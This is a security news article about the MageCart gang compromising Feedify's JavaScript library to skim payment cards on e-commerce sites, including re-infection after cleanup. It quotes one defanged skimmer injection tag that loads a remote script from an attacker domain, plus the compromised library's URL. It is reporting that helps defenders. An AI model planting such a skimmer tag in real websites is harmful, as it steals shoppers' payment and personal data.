MageCart cyber gang compromised the cloud service firm Feedify and stole payment card data from customers of hundreds of e-commerce sites.

The MageCart crime gang is very active in this period: payment card data from customers of hundreds of e-commerce websites may have been stolen after the compromise of the cloud service firm Feedify.

Cloud service firm Feedify has over 4,000 customers. It is a cloud platform that lets its customers engage their own clients with tools that target visitors based on their behavior.

Feedify leverages a JavaScript script that their customers add to their websites to use the service. MageCart hackers compromised the supply chain for the Feedify service. The script loads various resources from Feedify’s infrastructure, including a library named “feedbackembad-min-1.0.js,” which was compromised by MageCart.

Every time a user visited a page of a Feedify customer's e-commerce site, the page loaded the malicious script, which allowed the crooks to siphon personal information and payment card data.

They've been affected by Magecart since Friday, August 17 2018 @ 16:51:01 GMT as we recorded it. https://t.co/VjD5Qc3Be0 — Yonathan Klijnsma (@ydklijnsma) September 11, 2018

The group has been active since at least 2015 and compromised many e-commerce websites to steal payment card and other sensitive data.

The group injects a skimmer script into the target websites to siphon payment card data: once the attackers succeed in compromising a site, they add an embedded piece of JavaScript to the HTML template. Below is an example of the script dubbed MagentoCore.

<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>

This script records keystrokes from customers and sends them to a server controlled by the attacker.

Typically hackers attempt to compromise third-party features that could allow them to access a large number of websites.

According to the security firm RiskIQ, the MageCart group carried out a targeted attack against British Airways and used a customized version of the script to remain under the radar.

Using the same tactic, MageCart compromised the websites using the Feedify service by injecting their malicious code into a library that the Feedify script served to customers' websites.

According to the experts from RiskIQ, MageCart hackers might have had access to the Feedify servers for nearly a month.

Once Feedify was notified of the compromise, the company removed the malicious script:

Magecart on Feedify. A customer engagement tool. According to their website 4000+ websites use their tooling/code. Fixed today after I notified them. @ydklijnsma @GossiTheDog pic.twitter.com/K2czXkUoHD — Placebo (@Placebo52510486) September 11, 2018

but apparently, the hackers re-infected the library.

FYI: Feedify is re-infected with Magecart since about an hour ago, exact time of infection is: Wed, 12 Sep 2018 14:16:02 GMT. URL: hxxps://cdn[.]feedify[.]net/getjs/feedbackembad-min-1.0.js /cc @Placebo52510486 @GossiTheDog @_feedify https://t.co/4DtpP3l0Wd — Yonathan Klijnsma (@ydklijnsma) September 12, 2018

The events demonstrate the ability of the MageCart crime gang to compromise the infrastructure of its victims and to return after a cleanup.

In August, security expert Willem de Groot discovered that the MagentoCore skimmer had at that time already infected 7,339 Magento stores.

At the time, a query of the PublicWWW service showed that the MagentoCore script was deployed on 5,214 domains; the number of compromised websites is still high (4,762) despite the awareness campaign.

Pierluigi Paganini

(Security Affairs – cybercrime, MageCart)
